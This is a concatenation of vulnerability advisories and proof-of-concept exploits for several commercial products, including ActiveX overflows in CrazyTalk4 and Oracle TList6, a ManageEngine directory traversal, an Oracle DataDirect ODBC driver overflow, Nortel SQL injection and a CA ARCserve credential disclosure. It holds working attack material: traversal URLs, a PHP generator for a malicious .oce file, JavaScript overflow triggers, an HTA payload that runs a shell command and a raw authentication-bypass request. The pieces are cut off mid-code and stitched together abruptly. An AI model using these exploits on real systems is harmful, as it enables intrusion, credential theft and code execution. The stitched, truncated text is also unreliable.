http://www.google.com/search?sclient=psy-abhl=enbiw=1024bih=581source=hpq=crazytalk4.ocxbtnG=Search
http://www.google.com/search?sclient=psy-abhl=enbiw=1024bih=581source=hpq=CrazyTalk4Native.dllbtnG=Search
http://dell-webcam-central.software.informer.com/users/
http://live-cam-avatar-creator.software.informer.com/users/
I think this is a very common ActiveX, probably bundled with Dell Notebooks.
Background:
The mentioned software carries a third party ActiveX Control
with the following settings.
Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
Safe for Scripting (Registry): True
Safe for Initialization (Registry): True
This control is marked safe for scripting and safe for initialization,
then Internet Explorer will allow scripting of this control from remote.
Vulnerability:
The 'BackImage' ,'ScriptName', 'ModelName' and 'SRC' properties
can be used to trigger a buffer overflow condition.
The crazytalk4.ocx ActiveX control will load the close CrazyTalk4Native.dll
library and, while constructing a local file path, will call sprintf()
with an insufficient size.
Call stack of main thread
AddressStack Procedure / arguments
Called from
Frame
0012EE24 023D4FAB msvcrt.sprintf
CrazyTal.023D4FA5
0012EE28 0012F180 s = 0012F180
0012EE2C 023F431C format = %s%s%s
0012EE30 042A2D6C %s = C:\DOCUME~1\Admin\LOCALS~1\Temp\RLTMP\~RW463\
0012EE34 0012EF5C %s =
aa
0012EE38 0012EE58 %s =
0012F164 023D601D CrazyTal.023D4F20
code, CrazyTalk4Native.dll :
..
023D4F80 85C0 test eax,eax
023D4F82 74 38je short CrazyTal.023D4FBC
023D4F84 8B9C24 2C03 mov ebx,dword ptr ss:[esp+32C]
023D4F8B 8D4424 1Clea eax,dword ptr ss:[esp+1C]
023D4F8F 8D8C24 2001 lea ecx,dword ptr ss:[esp+120]
023D4F96 50 push eax
023D4F97 81C6 443Badd esi,3B44
023D4F9D 51 push ecx
023D4F9E 56 push esi
023D4F9F 68 1C433F02 push CrazyTal.023F431C ; ASCII
%s%s%s
023D4FA4 53 push ebx
023D4FA5 FF15 E4F33E02call dword ptr ds:[MSVCRT.sprintf];
msvcrt.sprintf
..
As attachment, proof of concept code which overwrites EIP and SEH.
Note:
0:008 lm -vm CrazyTalk4Native
startendmodule name
021c 0220b000 CrazyTalk4Native (deferred)
Image path: C:\PROGRA~1\COMMON~1\REALLU~1\CTPLAY~1\CrazyTalk4Native.dll
Image name: CrazyTalk4Native.dll
Timestamp:Thu May 17 12:13:42 2007 (464C2AD6)
CheckSum: 00048AB2
ImageSize:0004B000
File version: 4.5.815.1
Product version: 4.0.0.1
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type:2.0 Dll
File date:.
Translations: 0409.04b0
CompanyName: C3D
ProductName: CrazyTalk4 ActiveX Control Module
InternalName: CrazyTalk4
OriginalFilename: CrazyTalk4.OCX
ProductVersion: 4, 0, 0, 1
FileVersion: 4, 5, 815, 1
PrivateBuild: 4, 5, 815, 1
SpecialBuild: 4, 5, 815, 1
FileDescription: CrazyTalk4 Native Control Module
LegalCopyright: Copyright (C) 2005
LegalTrademarks: Copyright (C) 2005
Comments: Copyright (C) 2005
proof of concept: http://retrogod.altervista.org/9sg_dell_poc_nodep.html
ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability
ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet
Unauthenticated
Remote Directory Traversal Vulnerability
product homepage: http://www.manageengine.com/products/device-expert/
file tested: ManageEngine_DeviceExpert.exe
tested against: Microsoft Windows Server 2003 r2 sp2
Description:
DeviceExpert is a webbased, multi vendor network change, configuration and
compliance management (NCCCM) solution for switches, routers, firewalls and
other network devices. Trusted by thousands of network administrators
around the world, DeviceExpert helps automate and take total control
of the entire life cycle of device configuration management.
[..]
Background:
The mentioned product installs a Java application server
which listen by default on port 6060 (https) for incoming
connections.
Vulnerability:
Without prior authentication, is possible to invoke the
ScheduleResultViewer servlet to disclose every file
on target system. This can be done through the
FileName argument which suffers of a directory traversal
vulnerability.
examples:
https://[host]:6060/scheduleresult.de/?FileName=conf\Authentication\auth-conf.xml
https://[host]:6060/scheduleresult.de/?FileName=..\..\..\..\..\..\..\..\..\..\boot.ini
auth-conf.xml stores the authentication credentials to the
administrative interface (username, hashed password and a salt).
It is also possible to backup the MySQL database tables by cycling
through subfolders.
Theese tables can contain also usernames and passwords of
the configured devices, remember the software functionality,
it supports multiple vendors devices from the following list:
..
Cisco, HP, Nortel, Juniper, Force10, 3Com, D-link, Foundry, Dell, Aruba,
Extreme, ADTRAN, Enterasys, Huawei, Blue Coat, Proxim, NetScreen, NETGEAR,
FortiNet, ALAXALA, Brocade, Radware, DAX, H3C, Yamaha, Vanguard, Allied
Telesis, Alcatel, Fujitsu, Motorola, Acme Packet, Watch Guard, Canoga Perkins
..
Explaination:
look at the web.xml located inside
C:\ManageEngine\DeviceExpert\webapps\ncm\WEB-INF\ :
..
servlet
servlet-nameScheduleResultViewer/servlet-name
servlet-classcom.adventnet.ncm.client.schedule.ScheduleResultViewerServlet/servlet-class
/servlet
servlet-mapping
servlet-nameScheduleResultViewer/servlet-name
url-pattern/scheduleresult.de/*/url-pattern
/servlet-mapping
..
now decompile ScheduleResultViewerServlet.class:
..
package com.adventnet.ncm.client.schedule;
import com.adventnet.ncm.util.NCMServerUtil;
import java.io.*;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.servlet.ServletException;
import javax.servlet.http.*;
public class ScheduleResultViewerServlet extends HttpServlet
{
public ScheduleResultViewerServlet()
{
logger =
Logger.getLogger(com/adventnet/ncm/client/schedule/ScheduleResultViewerServlet.getName());
}
public void service(HttpServletRequest request, HttpServletResponse
response)
throws ServletException, IOException
{
FileInputStream in;
OutputStream out;
in = null;
out = null;
try
{
String fileName = request.getParameter(FileName);
//--
if(fileName.endsWith(.pdf))
{
response.reset();
response.setContentType(application/pdf;charset=utf-8);
} else
{
response.setContentType(text/html;charset=utf-8);
}
File file = new File((new
StringBuilder()).append(NCMServerUtil.SERVER_HOME).append(FS).append(fileName).toString());
//---
response.setContentLength((int)file.length());
in = new FileInputStream(file);
out = response.getOutputStream(); //-
byte buf[] = new byte[1024];
for(int count = 0; (count = in.read(buf)) = 0;)
out.write(buf, 0, count); //-
}
catch(Exception ex)
{
logger.log(Level.SEVERE, Exception while processing request in
ScheduleResultViewerServlet, ex);
throw new ServletException(ex);
}
if(in != null)
in.close();
if(out != null)
out.close();
break MISSING_BLOCK_LABEL_221;
Exception exception;
exception;
if(in != null)
in.close();
if(out != null)
out.close();
throw exception;
}
Logger logger;
private static final String FS = System.getProperty(file.separator);
}
'FileName' is taken from the request parameter without sanitization then
is passed to the File object. File content is showed to the remote user.
I think this is a huge vulnerability because this could open the path to
the equipments of an entire network.
As attachment, proof of concept code, which backup the underlying Mysql
database. You could also choose
Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution Vulnerability
Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code
Execution Vulnerability
tested against: Internet Explorer 8
Microsoft Windows Server 2003 r2 sp2
download url:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html
files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip
HyperionFinancialManagement-11121.zip
Background:
the mentioned program installs an ActiveX control with the following
settings:
Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True
This control is marked safe for scripting and safe for initialization,
Internet Explorer will allows scripting of this control.
Vulnerability:
The mentioned class contains the vulnerable SaveData() method, see typelib:
..
/* DISPID=167 */
/* VT_I2 [2] */
function SaveData(
/* VT_BSTR [8] */ $lpszFileName
)
{
}
..
which allows to create / overwrite files with arbitrary extensions
inside arbitrary locations ex. automatic startup folders. By manipulating
ex. the Caption property is possible to create a valid application
with .hta extension.
The resulting file will look like this:
00 62 99 65 87 3b d4 11 a2 1f 00 e0 29 18 98 26 .be;Ô. ¢..à).
0010 09 00 06 00 ac 14 00 00 ac 14 00 00 e4 00 00 00 ¬... ¬...ä...
0020 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 ..Rã.Î .ã.ª.K¸
0030 51 01 00 00 00 90 01 c0 d4 01 00 0f 54 69 6d 65 Q.À Ô...Time
0040 73 20 4e 65 77 20 52 6f 6d 61 6e 01 00 01 01 00 s New Ro man.
0050 08 00 00 80 05 00 00 80 0e 00 00 80 0d 00 00 80 ...... ......
0060 2c 01 00 00 e1 00 00 00 e1 00 00 00 f1 ff ff ff ,...á... á...ñÿÿÿ
0070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0080 00 00 00 00 00 00 00 00 01 5c 61 3e 3e 3e 3e 3e .\a
0090 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3c 53 43 52SCR
00a0 49 50 54 3e 20 76 61 72 20 78 3d 6e 65 77 20 41 IPT var x=new A
00b0 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 ctiveXOb ject(WS
00c0 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 20 78 cript.Sh ell); x
00d0 2e 45 78 65 63 28 22 43 41 4c 43 2e 45 58 45 22 .Exec(C ALC.EXE
00e0 29 3b 20 3c 2f 53 43 52 49 50 54 3e 00 01 01 01 ); /SCR IPT
00f0 03 00 ff ff ff ff ff ff ff ff 00 01 00 01 00 00 ..ÿÿ ÿÿ..
0100 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00
0110 01 00 00 00 00 00 03 00 01 00 00 00 ff 00 00 00 ÿ...
0120 00 00 00 08 00 00 80 01 00 00 00 00 00 00 00 00 ...
0130 00 17 00 00 80 18 00 00 80 00 00 00 00 01 00 1a ... ...
0140 62 99 65 87 3b d4 11 a2 1f 00 e0 29 18 98 26 44 be;Ô.¢ ..à).D
0150 55 02 00 00 00 12 00 06 00 0b 00 02 00 00 00 00 U...
0160 00 00 04 00 03 00 00 60 ab 4e 06 10 00 00 00 5f ...` «N._
0170 5f 4f 62 73 6f 6c 65 74 65 56 61 6c 75 65 00 00 _Obsolet eValue..
0180 00 00 00 00 00 00 00 00 60 ab 4e 06 00 00 00 00 `«N.
0190 01 4d 4b 10 00 00 00 00 00 01 00 00 00 02 00 00 .MK.
01a0 00 03 00 00 00 04 00 00 00 05 00 00 00 06 00 00
01b0 00 07 00 00 00 08 00 00 00 09 00 00 00 0a 00 00
01c0 00 0b 00 00 00 0c 00 00 00 0d 00 00 00 0e 00 00
01d0 00 0f 00 00 00 00 00 ff 00 00 ff ff ff 00 00 00 ...ÿ ..ÿÿÿ...
01e0 ff 00 00 00 00 00 00 05 00 00 00 02 00 00 00 00 ÿ...
01f0 00 01 00 00 c0 c0 c0 22 00 00 08 00 00 00 09 00 ÀÀÀ
0200 01 00 00 80 bf ff 31 00 00 00 8a e3 aa 2b 84 ee ...¿ÿ1. ..ãª+î
0210 e5 a0 2b 84 a8 ac a0 0c 00 00 00 35 35 32 58 58 å +¨¬ . ...552XX
0220 58 58 58 44 45 4d 4f 08 00 00 00 4a 6f 68 6e 20 XXXDEMO. ...John
0230 44 6f 65 1e 00 01 00 00 00 00 40 00 00 ff ff ff Doe. ..@..ÿÿÿ
0240 00 90 01 00 00 02 00 d7 00 00 00 44 55 06 00 00 ..× ...DU...
0250 00 12 00 06 00 0b 00 06 00 00 00 f8 8f 50 04 10 ...øP..
0260 00 00 00 5f 5f 49 6e 6e 65 72 50 69 63 41 6c 69 ...__Inn erPicAli
0270 67 6e 00 03 00 05 00 00 00 00 10 58 66 04 13 00 gn.. ...Xf...
0280 00 00 5f 5f 49 6e 6e 65 72 42 6f 72 64 65 72 43 ..__Inne rBorderC
0290 6f 6c 6f 72 00 03 00 00 00 00 00 00 20 b5 56 08 olor µV.
02a0 13 00 00 00 5f 5f 49 6e 6e 65 72 42 6f 72 64 65 __In nerBorde
02b0 72 53 74 79 6c 65 00 03 00 00 00 00 00 00 30 f4 rStyle.. ..0ô
02c0 60 08 11 00 00 00 5f 5f 49 6e 6e 65 72 42 61 63 `.__ InnerBac
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC (*.oce)
?php
/*
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer
Overflow PoC (*.oce)
by rgod
found a local vector for this:
http://retrogod.altervista.org/9sg_oracle_datadirect.htm
http://www.exploit-db.com/exploits/18007/
This poc will create a suntzu.oce file
which should work against Hyperion Interactive Reporting Studio
which is delivered with Oracle Hyperion Suite.
When clicked a login box appears, on clicking OK an error message
also appears then error then... boom!
description for .oce :
Interactive Reporting database connection file
file association:
C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe %1
crash dump, eip and seh overwritten, unicode expanded,
I suppose one should be able to deal with it :
(208.152c): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=008b ebx= ecx=0e752eb8 edx=0f49 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010286
brioqry+0x10043:
00410043 0152ff add dword ptr [edx-1],edx ds:0023:0f48=
0:000 g
(208.152c): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=008b ebx= ecx=00410041 edx=7c8285f6 esi= edi=
eip=00410043 esp=00129f10 ebp=00129f30 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010286
brioqry+0x10043:
00410043 0152ff add dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00
*/
function _x($x){
global $buff;
list($x) = array_values(unpack('V', $x));
$x = $x + strlen($buff);
$x = pack('V',$x);
return $x;
}
$buff = mydatabase.com.
str_repeat(\x20,16). //cosmetics, no ... inside the login box
str_repeat(\x41,4000);
//$dsn=DRIVER=DataDirect 6.0 Greenplum Wire
Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;;
//$dsn=DRIVER=DataDirect 6.0 MySQL Wire
Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null;
$dsn=DRIVER=DataDirect 6.0 PostgreSQL Wire
Protocol;HOST=;UID=system;PWD=X;;
while (!(strlen($dsn)==166)){ //fill the gap
$dsn.=\x20;
}
$dsn=str_replace(HOST=;,HOST=.$buff.;,$dsn);
$dump=
#BRIF\x20BIN001.
\x00\x00\x00\x00.
_x(\x7b\x07\x00\x00). //header length, increase counter
\x37\x00\x00\x00. //path length
D:\\Documents\x20and\x20Settings\\Admin\\Desktop\\Predefinito.oce.
\x01\x00\x01\x00.
\x00\x00\x07\x00.
\x00\x00\x0a\x00.
\x00\x00.
_x(\xa6\x00\x00\x00). //dsn length
$dsn.
\x00\x00\x00\x00.
\x00\x00\x00\x00.
\x04\x00\x00\x00.
True.
\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00.
\x00\x00\x00\x01\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00.
\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00.
\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x04\x00\x00\x00\x00.
\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00.
\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04.
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.
\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\r\x00\x00\x00.
ColItem.Table.
\x01\x00.
\x00\x00\x04\x00\x00\x00\x12\x00\x00\x00.
ColItem.TableAlias.
\x01\x00\x00\x00\x10\x00.
\x00\x00\r\x00\x00\x00.
ColItem.Owner.
\x01\x00\x00\x00\x1c\x00\x00\x00\x0c\x00\x00.
\x00.
ColItem.Type.
\x01\x00\x00\x00(\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00.
Source.
\x01\x00\x00\x00\x05\x00\x00\x004\x00\x00\x00\x05\x00\x00\x00.
Where.
\x01.
\x00\x00\x00\x05\x00\x00\x008\x00\x00\x00\x07\x00\x00\x00.
OrderBy.
\x01\x00.
\x00\x00\x05\x00\x00\x00\x00\x00\x00|\x00\x00\x00\x04\x00\x00\x00.
\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00.
\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.
\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00.
\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00.
\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.
\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00.
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.
\x00\x00\x00\x00\x09\x00\x00\x00\x0c\x00\x00\x00ColItem.Name\x01\x00\x00\x00.
\x04\x00\x00\x00\x10\x00\x00\x00.
ColItem.ColAlias.
\x01\x00\x00\x00\x10\x00\x00\x00.
\x0e\x00\x00\x00.
ColItem.ColNum.
\x01\x00\x00\x00\x1c\x00\x00\x00\x0f\x00\x00\x00.
ColItem.ColType.
\x01\x00\x00\x00(\x00\x00\x00\x10\x00\x00\x00.
ColItem.NumBytes.
\x01\x00\x00\x004\x00.
\x00\x00\x0e\x00\x00\x00.
ColItem.Places.
\x01\x00\x00\x00@\x00\x00\x00\x0e\x00\x00.
\x00.
ColItem.Digits.
\x01\x00\x00\x00L\x00\x00\x00\r\x00\x00\x00.
ColItem.Nulls.
\x01\x00\x00\x00X\x00.
\x00\x00\x12\x00\x00\x00.
ColItem.NativeType.
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute
Stack Based Buffer Overflow Vulnerability
tested against: Microsoft Windows 2k3 r2 sp2
Oracle Hyperion Performance Management and BI (v11.1.2.1.0)
download url of the Oracle Hyperion suite:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html
files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip
Vulnerability:
The mentioned product installs various drivers to allow
the software to get informations from ODBC data sources.
Some of them are vulnerable to a remote stack based buffer
overflow which can be triggered by specifying an overlong
HOST attribute inside the connection string. The software
tries to do an unicode/ASCII conversion.
In doing this, the stack is completely smashed
allowing to redirect the execution flow to an user supplied buffer.
Analysis for (*) and errata corrige, too many nights awake :
When receiveng the attribute, arsqls24.dll
does an unicode/ASCII conversion; this fragment of code
counts the number of bytes needed and store it in eax
..
01D45C10 83C1 02 add ecx,2
01D45C13 83C0 01 add eax,1
01D45C16 66:8339 00 cmp word ptr ds:[ecx],0
01D45C1A ^75 F4jnz short ARSQLS24.01D45C10
..
the next operation is a copy loop which moves the needed
bytes to a memory region pointed by ecx, trusting the
eax counter.
..
01D48C36 8A16 mov dl,byte ptr ds:[esi]
01D48C38 83E8 01 sub eax,1
01D48C3B 8811 mov byte ptr ds:[ecx],dl
01D48C3D 83C1 01 add ecx,1
01D48C40 83C6 02 add esi,2
01D48C43 85C0 test eax,eax
01D48C45 ^75 EFjnz short ARSQLS24.01D48C36
..
The memory region pointed by ecx is adjacent to critical
structures (stack pointers), so when the HOST attribute
is an overlong string the stack is partially overwritten
with user supplied values. The result, after a few steps:
EAX
ECX 0003
EDX 02B52E88
EBX 0013C720 ASCII
AA
ESP 0013C720 ASCII
AA
EBP 0013D1A4
ESI 02B56FF8
EDI 0001
EIP 41414141
C 0 ES 0023 32bit 0()
P 1 CS 001B 32bit 0()
A 0 SS 0023 32bit 0()
Z 0 DS 0023 32bit 0()
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS NULL
D 0
O 0 LastErr WSAHOST_NOT_FOUND (2AF9)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
MM0
MM1
MM2
MM3
MM4
MM5
MM6 8000
MM7 FEE0
poc:
The underlying operating system contains the ADODB Connection
ActiveX control which is marked safe for initialization
and safe for scripting (implements the IObjectSafety interface)
which could allow a remote attacker to specify the
mentioned connection string.
The IE security settings do not allow to open a connection
from another domain but this can be used in conjuntion
with a XSS vulnerabilty, connection string pollution or
SQL injection vulnerabilities or through specific configuration
files. Note also that I am mentioning the ADODB object for pure
commodity: when installed, the ODBC drivers are availiable
systemwide, so this is a good basis for remote privilege elevations
of many kinds.
Note that Internet Explorer does not crash when trying to
execute EIP, attach a tool like faultmon to the IE sub-process.
(*)
!-- saved from url=(0014)about:internet --
script
var obj = new ActiveXObject(ADODB.Connection);
x=; for (i=0;i666;i++){x = x + }
obj.ConnectionString =DRIVER=DataDirect 6.0 SQL Server Native Wire
Protocol;HOST= + x + ;IP=127.0.0.1;PORT=9;DB=xx;UID=sa;PWD=null;
obj.Open();
/script
!-- saved from url=(0014)about:internet --
script
var obj = new ActiveXObject(ADODB.Connection);
x=; for (i=0;i1666;i++){x = x + }
obj.ConnectionString =DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST= + x
+ ;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;
obj.Open();
/script
!-- saved from url=(0014)about:internet --
script
var obj = new ActiveXObject(ADODB.Connection);
x=; for (i=0;i1666;i++){x = x + }
obj.ConnectionString =DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST= + x
+
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
?php
/*
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration
Web Service getSubKeys() Remote SQL Injection Exploit
tested against:
Microsoft Windows Server 2003 r2 sp2
Microsoft SQL Server 2005 Express
download uri:
ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso
background:
This software installs a Tomcat http server which listens on
port 8080 for incoming connections. It exposes the
following servlet as declared inside
c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml :
..
servlet-mapping
servlet-nameEyrAPIConfiguration/servlet-name
url-pattern/EyrAPIConfiguration/*/url-pattern
/servlet-mapping
..
at the following url:
http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf
Vulnerability:
without prior authentication, you can reach a web service
with various methods availiable, as described inside
the associated wsdl, see file:
c:\Program Files\[choosen
folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl
among them, the getSubKeys() method.
Now look at getSubKeys() inside the decompiled
c:\Program Files\[choosen
folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class
:
..
public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String
systemId, String componentId, String sysCompId, String userName)
throws RemoteException
{
StringBuffer xml;
ConfigOwnerId configOwnerId;
Connection conn;
PreparedStatement pStmt;
ResultSet rs;
PreparedStatement pStmt2;
ResultSet rs2;
log.info((new StringBuilder()).append(Request getSubKeys:
iterateSubKeys=).append(iterateSubKeys).append(,
includeValues=).append(includeValues).append(,
SystemId=).append(systemId).append(,
componentId=).append(componentId).append(,
sysCompId=).append(sysCompId).append(,
userName=).append(userName).toString());
xml = new StringBuffer(ConfigurationNodeList);
configOwnerId = null;
conn = null;
pStmt = null;
rs = null;
pStmt2 = null;
rs2 = null;
try
{
conn = SiteDatabase.getInstance().getConnection();
if(EyrAPIProperties.getInstance().getProperty(database,
MSSQLServer).equalsIgnoreCase(Oracle))
{
if(componentId.compareToIgnoreCase() == 0)
componentId = *;
if(systemId.compareToIgnoreCase() == 0)
systemId = *;
if(sysCompId.compareToIgnoreCase() == 0)
sysCompId = *;
if(userName.compareToIgnoreCase() == 0)
userName = *;
pStmt = conn.prepareStatement((new
StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE
nvl(ComponentID, '*') = ').append(componentId).append(' AND
).append(nvl(SystemID, '*') = ').append(systemId).append(' AND
).append(nvl(SysCompID, '*') = ').append(sysCompId).append(' AND
).append(nvl(UserName, '*') = ').append(userName).append(').toString());
rs = pStmt.executeQuery();
} else
{
pStmt = conn.prepareStatement((new
StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE
ISNULL(CONVERT(varchar(36), ComponentID), '') =
').append(unpunctuate(componentId)).append(' AND
).append(ISNULL(CONVERT(varchar(36), SystemID), '') =
').append(unpunctuate(systemId)).append(' AND
).append(ISNULL(CONVERT(varchar(36), SysCompID), '') =
').append(unpunctuate(sysCompId)).append(' AND ).append(ISNULL(UserName,
'') = ').append(unpunctuate(userName)).append(').toString());
rs = pStmt.executeQuery();
}
if(rs.next())
{
String strConfigOwnerId = rs.getString(1);
if(!rs.wasNull())
configOwnerId = new ConfigOwnerId(strConfigOwnerId);
pStmt2 = conn.prepareStatement((new
StringBuilder()).append(SELECT ConfigGroupID, ConfigGroupName FROM
ConfigGroupView WHERE ConfigOwnerID =
').append(configOwnerId.toString()).append(').toString());
for(rs2 = pStmt2.executeQuery(); rs2.next();
xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys,
includeValues)));
}
}
catch(SQLException e)
{
String msg = Unable to get subkeys;
log.error(msg, e);
throw new RemoteException(msg, e);
}
catch(GenericDatabaseException e)
{
String msg = Unable to get subkeys;
log.error(msg, e);
throw new RemoteException(msg, e);
}
DbHelper.closeStatement(log, pStmt);
DbHelper.closeResultSet(log, rs);
DbHelper.closeStatement(log, pStmt2);
DbHelper.closeResultSet(log, rs2);
Embarcadero ER/Studio XE2 Server Portal Tom Sawyer's Default GET Extension Factory ActiveX Control Remote Code Execution
See: CVE-2011-2217
reference url: http://www.securityfocus.com/bid/48099
The mentioned product is vulnerable to the same issue.
download url: https://downloads.embarcadero.com/free/er_studio_portal
ActiveX settings:
ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1
CLSID: {658ED6E7-0DA1-4ADD-B2FB-095F08091118}
Binary path: D:\Program
Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll
Safe for scripting (registry): true
Safe for initialize (registry): true
poc:
script
var obj = new ActiveXObject(TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1);
/script
then the dll will try to call inside an unitialized memory region
which is reachable by an attacker through heap spray.
//rgod
CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution
?php
/*
CA ARCserve D2D r15 GWT RPC Request Auth Bypass /
Credentials Disclosure and Commands Execution PoC
product homepage: http://arcserve.com/us/default.aspx
file tested: CA_ARCserve_D2D_Setup_BMR.zip
tested against: Microsoft Windows Server 2003 r2 sp2
This software installs a Tomcat HTTP server which listens
on port 8014 for incoming connections (this port is also
added automatically to firewall exceptions to exhacerbate
the vulnerability I am going to describe).
It uses a GWT RPC (Google Web Toolkit Remote Procedure
Call) mechanism to receive messages from the Administrator
browser.
Without prior authentication, a remote user with access
to the web server can send a POST request to the homepageServlet
serlvet containing the getLocalHost message and the correct
filename of a certain descriptor to disclose the
username and password of the target application.
This username and password pair are Windows credentials
with Administrator privileges, requested during
the ARCserve installation process (it clearly says this, an user
from the Administrators group).
This works with the mentioned software perfectly
installed and configured and after the Administrator user
logged in *one time each Tomcat session, logged out or not*
(which I think is easily exploitable against a production
service running twenty four hours a day). You could also choose
to resend the request indefinetely, waiting for the Administrator
to be logged in.
Example packet:
POST /contents/service/homepage HTTP/1.1
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D
5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|
Note that '2C6B33BED38F825C48AE73C093241510' is a static value
which represents a filename of a gwt rpc descriptor which can be found inside
the default path:
C:\Program Files\CA\ARCserve
D2D\TOMCAT\webapps\ROOT\contents\2C6B33BED38F825C48AE73C093241510.gwt.rpc
Note also that this packet does not contain any session id.
Response packet:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 480
Date: Wed, 13 Jul 2011 18:57:19 GMT
